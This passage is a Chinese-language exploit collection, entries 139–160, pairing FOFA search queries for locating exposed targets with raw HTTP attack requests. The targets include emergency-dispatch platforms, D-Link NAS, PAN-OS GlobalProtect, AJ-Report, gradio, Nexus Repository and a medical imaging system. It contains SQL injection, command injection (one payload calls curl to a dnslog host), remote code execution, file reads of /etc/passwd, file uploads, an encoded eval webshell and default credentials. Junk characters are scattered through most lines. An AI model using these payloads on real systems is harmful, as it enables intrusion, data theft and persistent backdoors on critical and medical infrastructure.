CVE-2024-2621$ D6 O6 o; k8 D9 w2 ]; g2 s
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
% R% Q3 X% Q- ~5 pGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.15 s- ^$ M( E+ c; a+ @8 I) j, S' X
Host: x.x.x.x
" s5 q+ U) P3 f0 P* q* HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0: |. R. r. F$ m* O$ U& U: Y5 S3 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 W1 F7 q1 _! }( U2 AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ `1 [* ?$ G2 K9 h
Accept-Encoding: gzip, deflate, br( r- Z- w3 K/ L6 D5 d3 N
Connection: close
% x0 X3 W8 l# y' g3 m0 OUpgrade-Insecure-Requests: 1$ l0 I  P8 V! O# W
' k# B" T* \& X( A, S: L
, ?& x0 |7 c/ a  x6 b- g' i
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
9 y7 G, P3 d" H+ }& RCVE-2024-2622
3 W6 x$ q' t: `FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"  c& t4 g. g* q) G
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
( X4 u, \# l5 OHost: x.x.x.x1 H- n5 U' |3 P. K: e9 X+ i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0+ J6 g( {$ z9 q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 j& A# t0 C3 [, |% d- j7 a; Y' x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 X# {' i/ w+ L! P4 h1 ]1 J
Accept-Encoding: gzip, deflate, br1 D! `- G1 ^4 ]) B( f+ C0 B0 |
Connection: close. N! u: F& A* p8 G* F4 x. h- v
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk7 c" Z2 x! a; u, Q8 u
Upgrade-Insecure-Requests: 1
) p- }$ [9 w  D) Y, {2 r- |4 g" Y
9 q+ V! `4 e% A% v$ v+ p! o9 w% H& m
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
+ ^( O: N7 ?9 H' F8 x& yCVE-2024-2566
- q- P+ s# |8 b+ C* WFOFA:body="app/structure/departments.php" || app="指挥调度管理平台": f/ k# z  D2 n1 l% ~" R
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.17 W! w9 \  p8 V: f& i: n8 V( L
Host: x.x.x.x
1 L! u. G; U! j, fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0: R/ y: O' U  s0 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" f/ l/ u& q" K) b$ rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 Y( |9 f) E. t6 e
Accept-Encoding: gzip, deflate, br$ d  p$ t7 |) r4 p2 A8 g; X+ B
Connection: close
  V7 N  [) D0 @: {3 B  RCookie: authcode=h8g94 v- s+ v7 c+ a
Upgrade-Insecure-Requests: 1. g& j5 o) ^, X+ E/ S

, |, O# j0 F7 T- J  g; f( y# f- T6 s4 o
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入) t% O8 p% \+ B; t( n. u
FOFA:body="指挥调度管理平台"
9 }% i' X+ m% L- ^: zPOST /app/ext/ajax_users.php HTTP/1.1- g5 r  D% M) j# ^! A6 }; @
Host: your-ip
$ z' C; T- A$ H! {User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info* T+ U8 @+ y8 T5 P- y8 o, U6 V" g+ C& G& k
Content-Type: application/x-www-form-urlencoded
$ X& A2 l# D' R  N5 Z; ~4 j- _- Z9 B: c

; Q2 D! y1 e% y" E: cdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -  N) B4 A' ]1 Z5 r) G; o0 h4 a" K

" L% }7 [7 e$ a. F# d: h1 x- H9 d  R0 F' A$ j
142. CMSV6车辆监控平台系统中存在弱密码
( P# L2 K( Y8 e, M/ r1 l6 M# hCVE-2024-29666' A7 W  e1 Z1 \1 y/ e- d# q
FOFA:body="/808gps/"
# M& r, P6 e% d# l/ N- ]; T, k1 [admin/admin
& H! b7 n8 L7 u- G, X& s% }9 @143. Netis WF2780 v2.1.40144 远程命令执行
4 D! u% D3 C* P, H3 YCVE-2024-25850  n6 O) o9 H/ ?% J. T( Z$ I" m. Z; F
FOFA:title='AP setup' && header='netis'
! d3 K$ S% N* l* X! ^PAYLOAD
3 I4 G( Z) X3 K6 P
8 n/ e6 C) C5 Q- v$ I/ X* R144. D-Link nas_sharing.cgi 命令注入1 O& F7 E. V: E! H. V$ Q
FOFA:app="D_Link-DNS-ShareCenter"( D, X7 n# h0 t8 r* l) o; [
system参数用于传要执行的命令
% L, G5 W4 q, x/ |$ q0 DGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1& t# T& Z/ b. a; x( ]$ f2 D4 M. D
Host: x.x.x.x
9 X8 r9 u$ b9 _User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0( q6 q6 b5 H& v/ p: _
Connection: close6 E( P: o/ m$ N+ x. P* R
Accept: */*
& Q7 `% j+ l2 Z7 lAccept-Language: en
: Y7 `/ W0 Z$ x$ t4 LAccept-Encoding: gzip# v2 L. e9 J( o7 j- y( d

# z; b' r+ x8 w8 a- W
6 _* K$ [: n8 y$ O! B) d8 F( w/ T145. Palo Alto Networks PAN-OS GlobalProtect 命令注入" f. Z  e* p* H$ A! V0 |( Q
CVE-2024-3400* f# o% ?( ?+ W6 X) e& u7 d
FOFA:icon_hash="-631559155"
9 ]3 ~3 b% {5 ]2 k* S3 w6 ~& {! L; OGET /global-protect/login.esp HTTP/1.1
3 j; V" b8 i4 l. GHost: 192.168.30.112:1005
7 d& j' R/ w: G/ m: Z' s* gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.844 L3 [& }1 C' J0 Z$ S
Connection: close6 [( x. u. N- E+ x0 f
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
" P  f$ g7 }" Q& M7 g6 I/ NAccept-Encoding: gzip2 X* c4 p9 D/ F% U* y

; H$ N  T) g6 V0 ^0 U8 }' V6 }! u- j6 X6 j
146. MajorDoMo thumb.php 未授权远程代码执行' w1 o3 T) i4 U# d% O$ ~
CNVD-2024-02175
5 ]5 U3 Y, j/ @FOFA:app="MajordomoSL"
& c0 w: i, Q: D3 V; QGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1. c+ o( R( ]3 q
Host: x.x.x.x$ B: R0 I- I: I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.843 I4 x- `3 ]+ J! `/ a9 z1 K3 @; E
Accept-Charset: utf-8' `+ {5 A6 y, S' q+ {; s, P3 E
Accept-Encoding: gzip, deflate
: M7 N9 F  o& l. O: D  @3 RConnection: close
$ H* ^5 {& d3 Z5 e
; `- n, Y; S- g" z) U& O( x$ r: j' Z
5 a6 R- o, R9 W3 A: q147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
# ~. L' g$ |/ O! \. GCVE-2024-32399
/ R, V* C. l; f  AFOFA:body="RaidenMAILD"
7 [3 M; r% P' sGET /webeditor/../../../windows/win.ini HTTP/1.11 K4 ~+ M6 |2 `. V  S
Host: 127.0.0.1:813 @! G; s( N! T
Cache-Control: max-age=02 e; x$ ]4 F3 d4 M, O) s. C( W
Connection: close- k( T! l: \! B7 Z# \

+ T0 {! N, |  u2 p% c  X
4 f4 J' o; f! x148. CrushFTP 认证绕过模板注入
$ E$ w! c* z( S3 ]7 p, ^CVE-2024-4040
( Y$ ?  d) ~6 F" {" e( kFOFA:body="CrushFTP"
$ w4 v6 e5 X# C8 W" X; k1 v: ZPAYLOAD. m, O2 J2 M7 a; O

, V7 {3 ]  r: ?6 M149. AJ-Report开源数据大屏存在远程命令执行
/ L. e$ o# ^/ S* u; }FOFA:title="AJ-Report"
- s. l, Q4 u7 y6 i+ |. D1 T
4 F8 Z! c: K1 zPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1: `9 @, T; ^. Y2 Q: R; t
Host: x.x.x.x
, _* V/ ^, @; {& i" b. @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+ r. i  K2 q! q6 [/ O( f+ E0 A5 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 \  c' L8 P4 L2 X
Accept-Encoding: gzip, deflate, br  \# U! j1 k1 p7 n8 e
Accept-Language: zh-CN,zh;q=0.9
4 F( l4 F4 X# @5 m) U2 rContent-Type: application/json;charset=UTF-8# q; ~& ~" Q8 t( f. Q" k& N
Connection: close
' l& D( ]- J# l' Q0 R" d- J1 x2 Y$ \8 k# I) g6 _$ O# i
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}; W9 I2 u7 o# @4 ?: Y

$ ^# d! P. G" [$ z9 u150. AJ-Report 1.4.0 认证绕过与远程代码执行. S7 z: j% u5 p, @2 A. Z
FOFA:title="AJ-Report"
4 E# N3 Q- {0 M6 f& x& WPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
- g/ L+ @9 _, z) O8 ~3 j9 qHost: x.x.x.x3 K# X+ u2 b# K0 I( g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; P- J; y" S" W. V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 k0 o% n, a6 M+ @9 GAccept-Encoding: gzip, deflate, br
- [: E* n3 j+ B7 F: }7 ?Accept-Language: zh-CN,zh;q=0.9% J$ d; n, M; f! ^! _9 Y
Content-Type: application/json;charset=UTF-8! }- Z% I1 l# _# h5 w
Connection: close
% `: q( R! G0 i1 ]. ~, e6 z* x( ]Content-Length: 339
( A/ O9 z% }6 H! O! E' \" y4 U% i" ?
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}8 K+ d. }6 X  w  s: \( Z
3 M) N1 x7 r( U6 L: W# Z

6 q5 z; a( X. K& f0 p151. AJ-Report 1.4.1 pageList sql注入2 G# A7 v) X; j- e1 M' ]
FOFA:title="AJ-Report"
* g6 ~8 T& n  z4 E' A; yGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
  o7 o; l, D9 X( m( QHost: x.x.x.x
3 G0 w* X3 U/ P5 w2 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) q& n' A1 U2 I8 |) F3 j
Connection: close
+ E- s* o9 g' G6 M. [- o: VAccept-Encoding: gzip4 S4 {+ v9 I3 s
+ v  S, }9 v8 W
7 L6 z. r) e: c; u6 t4 \4 u3 d7 Y
152. Progress Kemp LoadMaster 远程命令执行4 m4 U% P; S* C
CVE-2024-1212
8 a. h6 M" I: E2 A4 VLoadMaster <= 7.2.59.2 (GA)
1 q0 P0 t. r3 I4 k+ m- xLoadMaster<=7.2.54.8 (LTSF)
$ E: H( I8 ~( cLoadMaster <= 7.2.48.10 (LTS)
3 F5 A+ s/ l+ @FOFA:body="LoadMaster"/ N( x0 z% r; w  z- Z
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码1 a6 A3 Q9 P; l8 b1 g
GET /access/set?param=enableapi&value=1 HTTP/1.1
& G7 D; ~+ A( a# q* KHost: x.x.x.x& r( f: I4 @2 ^/ i+ ^: c$ m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.12 r5 }3 D6 H7 {) @8 o- S4 D0 `# p3 ?
Connection: close: \3 r3 X0 Q* N1 U
Accept: */*0 S" z0 n7 V3 @# w
Accept-Language: en6 N* y$ P' c+ P* o
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=' U4 D5 F, w+ n; t. r
Accept-Encoding: gzip
6 f9 [, ]' i. a& i0 T6 E2 w7 E6 K9 t5 W; I
6 D! R$ s8 H' Y4 E" c; [
153. gradio任意文件读取
8 T" `1 P) w( B- G+ h% q. O( w4 KCVE-2024-1561FOFA:body="__gradio_mode__". z2 t$ c2 f  ^  g- N& ?
第一步,请求/config文件获取componets的id
% u; G+ x5 z3 J( y$ lhttp://x.x.x.x/config
' ?6 l+ X6 U# i& a8 d* ?) o$ k
" M) [" E1 c, v; b* D$ _9 n+ X. z  d* x
第二步,将/etc/passwd的内容写入到一个临时文件
" ]( S/ U1 x; {$ c) `7 IPOST /component_server HTTP/1.1
* w: k: w( k. M! {4 H! H; l; iHost: x.x.x.x8 Z2 G: U/ d/ w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
9 |; D# ]+ p/ s; W* @* K; aConnection: close
% t1 v0 q  W! S- E/ z+ WContent-Length: 115
) L& l8 `  S; x& gContent-Type: application/json, Q7 v! c6 ]# G' w1 P1 ^* _( W
Accept-Encoding: gzip
* k4 X  M# D+ Q- A# p, Q0 B3 B6 h$ a/ D0 E9 W4 J- O
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}3 u* n; k4 x# N, u

8 U, W  W7 H! Q/ U; g8 X* ?, n* z  X" E# |5 v
第三步访问% M. n* O& G" i: x
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
; u6 P. p5 D+ I5 s4 z& ^* m- X9 U/ w' R. q0 _

( }" y5 R1 I* P  Q1 H9 c154. 天维尔消防救援作战调度平台 SQL注入2 e) y4 X9 j' h7 L
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
4 b; X$ ~% D% ?, _* iPOST /twms-service-mfs/mfsNotice/page HTTP/1.17 X3 h) d: Z* [
Host: x.x.x.x
. f8 e1 n0 D, FContent-Length: 106
5 g  q0 B  u& P3 `Cache-Control: max-age=04 O! w8 j  Q* k* y! R7 d2 T
Upgrade-Insecure-Requests: 1
0 x" b# L/ {* l  Q1 UOrigin: http://x.x.x.x
1 Q- T" A" p  x- p# lContent-Type: application/json
% ~' h* l" @/ A) {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.360 z7 {2 W7 M9 J0 J7 a" M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& {; K, H/ _  m; q+ `. K0 K; zReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page" C& m* E; b7 X6 J. B+ g
Accept-Encoding: gzip, deflate  B; Z+ U8 p1 ^7 e8 e8 J
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
4 @# {) f/ Z5 g: {& yConnection: close# X# E! x' x3 g) ?+ |' b4 j. n
" p5 l2 O& h3 R# g0 H
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
! d5 Y5 v6 Q3 M( {3 O4 Q4 q+ }3 a# g/ F: o4 P% T6 \! O

1 H3 W9 e/ x  _3 }155. 六零导航页 file.php 任意文件上传! U, t; z# R/ Y
CVE-2024-34982
: }8 e% [( }1 O& W: GFOFA:title=="上网导航 - LyLme Spage"
0 n. D4 H# m% l2 y5 O3 X' K- \POST /include/file.php HTTP/1.1# T" `# Y/ B" n3 T7 w
Host: x.x.x.x4 m+ T7 }) g2 s1 a  d) {' x- t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
( L) _- J, s8 QConnection: close
9 ~# G5 Z! m/ {% x% FContent-Length: 2326 E& @# l, S! m+ `9 M" Y
Accept: application/json, text/javascript, */*; q=0.01
! m1 X) g3 B% TAccept-Encoding: gzip, deflate, br
" |2 F7 \/ ^' bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; T9 q( ]+ l. ^9 w
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
" e* U5 H' B" h; p( |! P, D/ oX-Requested-With: XMLHttpRequest
  M7 `* Q1 l) w9 U$ A& W& X
0 J  p: o" y7 {4 \' |( N. m2 E9 m-----------------------------qttl7vemrsold314zg0f6 ^0 W( B" V* ^7 F0 H: \% W
Content-Disposition: form-data; name="file"; filename="test.php". \+ ~! a" o  R( Q$ j# m3 l
Content-Type: image/png' {6 }) ^+ U5 v2 v

% g* V$ N$ p' P" x<?php phpinfo();unlink(__FILE__);?>
9 p9 m4 L. u3 D% V% s2 Y-----------------------------qttl7vemrsold314zg0f--
' z+ A/ Y8 v' {  s0 J# w. Y. I8 h$ O% k! i* G9 J+ ?. y
! K$ |# |; M- {* M
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php. \. y- z# u+ X; D  ]
3 B% A* _- J3 l" m# E
156. TBK DVR-4104/DVR-4216 操作系统命令注入
3 `1 E/ F5 E) `8 I, V( _6 g3 ^CVE-2024-37214 P4 A3 U1 ?9 o+ t
FOFA:"Location: /login.rsp"! n' `! _, V& w" @9 ?/ l
·TBK DVR-4104( d+ S7 f' ^) h- d, N
·TBK DVR-4216; b* k$ L- r3 L
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
, N8 q& A4 R$ }0 Z- Y$ {/ R# f  z: A# {" z8 A  k

% y% }) j& z' ^4 _9 OPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.13 m' e) s. ^& W3 r% {. u) p
Host: x.x.x.x2 @, `* }6 N/ y' t+ y5 B
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& M/ |, J. D- y" P( uConnection: close1 [. S; v5 b; j
Content-Length: 0
" J0 ~$ ]  m/ }# BCookie: uid=1, M! G, g1 x5 l
Accept-Encoding: gzip
# Z- E+ p$ l5 G5 S  y! x% w
1 L; n; y- ]' B/ t' `. p. {! R( u# l- E
157. 美特CRM upload.jsp 任意文件上传' [" f0 c5 j  R
CNVD-2023-06971! ~+ N8 R2 Z+ B) m4 m4 p1 C
FOFA:body="/common/scripts/basic.js"
" o/ Z% i6 }$ X9 W' u! ~1 GPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1; N7 ^3 M2 c5 k  \
Host: x.x.x.x6 u1 v3 z# s0 w- S( b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.367 D8 [9 G3 O& T* [3 M
Content-Length: 709: U9 L6 m7 K8 Q; A$ [1 h" U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  ?5 E3 d( M# P. f) f3 ?/ _1 zAccept-Encoding: gzip, deflate. ^" j, \# [3 D+ J/ ?
Accept-Language: zh-CN,zh;q=0.9
# |: n6 ^% K" O# k0 D% ^! Y% o4 pCache-Control: max-age=0
: _; T& h7 i  \5 p" EConnection: close; w" O" `5 B; q; T, k& g, w! _
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN0 R" }3 B+ p, Y; H4 \+ K) X4 J6 |
Upgrade-Insecure-Requests: 1
% A8 y6 r; j; P% c# B
3 S7 \6 H0 ^" B1 V, v- [1 l------WebKitFormBoundary1imovELzPsfzp5dN4 i. c1 o! _" v4 ?# x3 i
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
7 p2 F1 t9 K  u. l8 z+ u0 w0 VContent-Type: application/octet-stream2 E0 @" E/ D" \- ^2 [! s9 i* @$ w. C4 O
3 ]$ N; p2 W  k- Y7 P6 H2 T+ L
nyhelxrutzwhrsvsrafb( W+ Q! z# N' s' R' H
------WebKitFormBoundary1imovELzPsfzp5dN
6 V: V- Z: Q* ?3 v0 w  W- \; ^Content-Disposition: form-data; name="key"* P5 k% m8 z# ^0 Q4 b  A) E
  A8 I9 ~8 h# \/ p0 l6 b+ Z8 J
null
6 M+ `& W7 H6 p$ @' z$ ?& C! [8 U------WebKitFormBoundary1imovELzPsfzp5dN
9 C: N  i9 J7 V( U* b- Q* sContent-Disposition: form-data; name="form"
& D: g2 ^, n2 O2 y# x# D
2 F2 ]1 Q- i9 b* e: l, fnull5 N! O2 N0 Q# m6 B/ L7 t
------WebKitFormBoundary1imovELzPsfzp5dN9 G6 P7 N4 E7 i: f, U& ~
Content-Disposition: form-data; name="field"; A$ a: F. {! k
4 O$ K9 j6 C) }3 X# a
null
( U8 P0 w% |2 P5 n  C9 h' K------WebKitFormBoundary1imovELzPsfzp5dN7 |( ~: Q( M5 [  j, O) E/ O
Content-Disposition: form-data; name="filetitile"- V* b* x; O  O5 C* p2 M
) R4 \) T9 i6 {# H7 u0 c
null
% W1 u' M' B3 G! ?& l6 a+ k3 o" Z------WebKitFormBoundary1imovELzPsfzp5dN% k  V0 u( N- _0 {& C
Content-Disposition: form-data; name="filefolder"7 W5 N3 h; c; x$ N
( G$ `, w( W/ L+ \5 Y
null
% A0 W- j/ ~% }$ l0 J+ M* ?------WebKitFormBoundary1imovELzPsfzp5dN--8 h3 c: }% ?; J
7 E4 |+ q1 b$ F7 k- U( d. X
& Z; t% L/ P$ x/ @6 S, m: u* P
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
& ^8 E* a. e1 z: o8 R
/ t4 [& M4 ]" p+ Y# H; j158. Mura-CMS-processAsyncObject存在SQL注入
9 Q& T+ j: L" A% A, ^0 M( k( e! mCVE-2024-32640# }  h# v8 ?9 }& b2 e# C' P
FOFA:"Generator: Masa CMS"
4 V/ F6 j1 x, {, y& u6 k# Q0 cPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.16 K" C1 X2 U8 e* g: x4 k/ y  ]
Host: {{Hostname}}' v9 |6 s* G# ]& }
Content-Type: application/x-www-form-urlencoded
. S7 f0 e2 v; P8 s/ M4 `- U! p  ^: l0 g8 @+ b! i- z
object=displayregion&contenthistid=x\'&previewid=1: _$ f/ A0 C% U

% H# m* ?1 l, U) T
4 o( m$ M1 v9 w159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
& D" h6 [: C- N0 L- L* K' {FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
& C; H) Q. z9 W( WPOST /webservices/WebJobUpload.asmx HTTP/1.1
3 m3 H+ e' Z2 T; l4 k7 c- OHost: x.x.x.x
. x- f- i; D9 [: E* D9 x' x* yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36  b/ \0 Y5 F' X, r0 n6 _
Content-Length: 1080
- y! k* z: m# L* G8 i1 `  OAccept-Encoding: gzip, deflate
; w, C3 ?, \" ?6 b# V* b$ j& a: N% wConnection: close
4 ?. X2 A, t& R+ xContent-Type: text/xml; charset=utf-8
6 e0 G. h' a' {  l/ B3 LSoapaction: "http://rainier/jobUpload") @' L5 ?# f, z+ ?* X  R+ ]- h

* }* T! J  b# v$ H( E# a; K. k<?xml version="1.0" encoding="utf-8"?>
( c$ i; Q$ e& j, m5 f& Q<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  V- s1 p8 C  x  |, E# {/ p0 B<soap:Body>
/ r# u) {: _% o0 s9 L1 t/ I<jobUpload xmlns="http://rainier">) |- e4 y' {- b% j3 H, v
<vcode>1</vcode>: C" v: u( @' o% E2 W
<subFolder></subFolder>
( q5 ?2 R. R/ b4 w/ G<fileName>abcrce.asmx</fileName>: V! I( V" G9 w
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>! U2 G9 o5 D2 B' a' [4 @& ]* J
</jobUpload>
% [- _' O7 t" b6 d' H7 [</soap:Body>, L! A+ P" I) c9 ?2 G& v' ]- b
</soap:Envelope>
+ ~- H+ ^6 @9 ]2 D( W( ?' e) E7 e5 c1 p* Q( k) `+ U2 g
. l, E1 ]* s7 n/ h! }1 ~  G3 G: X
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")) J0 C9 K7 m% a% _1 q
% _1 [2 c3 b6 ~7 L7 ~
; p" T+ z$ b5 b& P9 m
160. Sonatype Nexus Repository 3目录遍历与文件读取2 D* e; b" h% h8 F4 T
CVE-2024-4956
/ ]/ I0 s! Z0 Z0 c+ @" wFOFA:title="Nexus Repository Manager"
4 t5 j6 P4 q# A! k, ~4 {, RGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1, ?- L' d' z/ B3 l
Host: x.x.x.x) y5 V+ q2 @/ G  }) H
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0! p9 I+ b3 C. |0 L0 b* j5 o: t( O
Connection: close3 _! }; E* |. U' i, x* S
Accept: */*
2 m) l- d9 h, b) }. jAccept-Language: en8 n8 R9 N; M5 X, D% }5 K; |
Accept-Encoding: gzip
, n$ @% G$ M' |) b& z8 p% z& ?/ i9 m7 @6 b7 I8 l& z( c) f
5 d4 X8 L( E1 \9 q6 |
